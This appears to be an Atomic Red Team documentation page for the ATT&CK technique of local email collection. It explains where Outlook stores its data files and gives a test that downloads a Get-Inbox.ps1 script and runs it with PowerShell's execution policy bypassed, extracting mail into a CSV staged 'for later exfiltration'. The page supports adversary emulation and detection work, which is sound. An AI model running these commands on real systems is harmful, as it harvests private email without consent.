Ctrl+K

T1114.001 - Local Email Collection

T1114.001 - Local Email Collection#

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.(Citation: Microsoft Outlook Files)

Atomic Tests#

Atomic Test #1 - Email Collection with PowerShell Get-Inbox#

Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating “Please be patient, this may take some time…”. Upon completion, final output will be a mail.csv file.

Note: Outlook is required, but no email account necessary to produce artifacts.

Supported Platforms: windows

Dependencies: Run with powershell!#

Description: Get-Inbox.ps1 must be located at #{file_path}#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1") {exit 0} else {exit 1}
Get Prereq Commands:#
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1"

Invoke-AtomicTest T1114.001 -TestNumbers 1 -GetPreReqs

Attack Commands: Run with powershell#

powershell -executionpolicy bypass -command "PathToAtomicsFolder\T1114.001\src\Get-Inbox.ps1" -file $env:TEMP\mail.csv

Invoke-AtomicTest T1114.001 -TestNumbers 1

Cleanup:#

Remove-Item $env:TEMP\mail.csv -Force -ErrorAction Ignore

Invoke-AtomicTest T1114.001 -TestNumbers 1 -Cleanup

Detection#

Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Contents